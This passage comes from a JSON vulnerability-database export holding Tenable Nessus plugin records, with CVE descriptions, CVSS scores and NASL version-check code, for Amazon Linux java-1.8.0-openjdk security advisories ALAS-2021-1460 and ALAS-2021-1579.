"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debuginfo", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2021-1460.NASL", "href": "https://www.tenable.com/plugins/nessus/145003", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2021-1460.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145003);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14803\"\n );\n script_xref(name:\"ALAS\", value:\"2021-1460\");\n\n script_name(english:\"Amazon Linux AMI : java-1.8.0-openjdk (ALAS-2021-1460)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of java-1.8.0-openjdk installed on the remote host is prior to 1.8.0.272.b10-1.56. It is, therefore,\naffected by multiple vulnerabilities as referenced in the ALAS-2021-1460 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization).\n Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple\n protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java. This vulnerability can be exploited through\n sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying\n data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed\n Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server\n deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and\n sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component\n without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web\n service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to\n client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start\n applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as\n through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2020-14782, CVE-2020-14797)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or\n delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of\n Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java\n applets. It can also be exploited by supplying data to APIs in the specified Component without using\n sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1\n Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). (CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a\n subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2020-14796)\n\n - Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability\n applies to Java deployments, typically in clients running sandboxed Java Web Start applications or\n sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and\n rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in\n servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base\n Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2021-1460.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14779\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14781\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14782\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14792\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14796\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14803\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update java-1.8.0-openjdk' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14792\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\npkgs = [\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.56.amzn1', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.56.amzn1', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk / java-1.8.0-openjdk-debuginfo / java-1.8.0-openjdk-demo / etc\");\n}", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-08T17:17:06", "description": "The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the ALAS2-2021-1579 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization).\n Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple\n protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java. This vulnerability can be exploited through\n sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying\n data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed\n Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server\n deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and\n sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component\n without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web\n service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to\n client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start\n applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as\n through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2020-14782, CVE-2020-14797)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or\n delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of\n Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java\n applets. It can also be exploited by supplying data to APIs in the specified Component without using\n sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1\n Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). (CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a\n subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2020-14796)\n\n - Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability\n applies to Java deployments, typically in clients running sandboxed Java Web Start applications or\n sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and\n rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in\n servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base\n Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-01-07T00:00:00", "title": "Amazon Linux 2 : java-1.8.0-openjdk (ALAS-2021-1579)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-01-07T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc", "cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-accessibility", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-accessibility-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debuginfo", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo"], "id": "AL2_ALAS-2021-1579.NASL", "href": "https://www.tenable.com/plugins/nessus/144805", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n# \n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2021-1579.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144805);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/07\");\n\n script_cve_id(\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14803\"\n );\n script_xref(name:\"ALAS\", value:\"2021-1579\");\n\n script_name(english:\"Amazon Linux 2 : java-1.8.0-openjdk (ALAS-2021-1579)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the ALAS2-2021-1579 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization).\n Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple\n protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java. This vulnerability can be exploited through\n sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying\n data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed\n Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server\n deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and\n sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component\n without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web\n service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to\n client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start\n applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as\n through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2020-14782, CVE-2020-14797)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or\n delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of\n Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java\n applets. It can also be exploited by supplying data to APIs in the specified Component without using\n sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1\n Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). (CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a\n subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2020-14796)\n\n - Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability\n applies to Java deployments, typically in clients running sandboxed Java Web Start applications or\n sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and\n rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in\n servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base\n Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2021-1579.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14779\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14781\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14782\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14792\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14796\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14803\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update java-1.8.0-openjdk' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14792\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-accessibility-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debug\");\n script_set_attribute(attribute:\"cpe\", 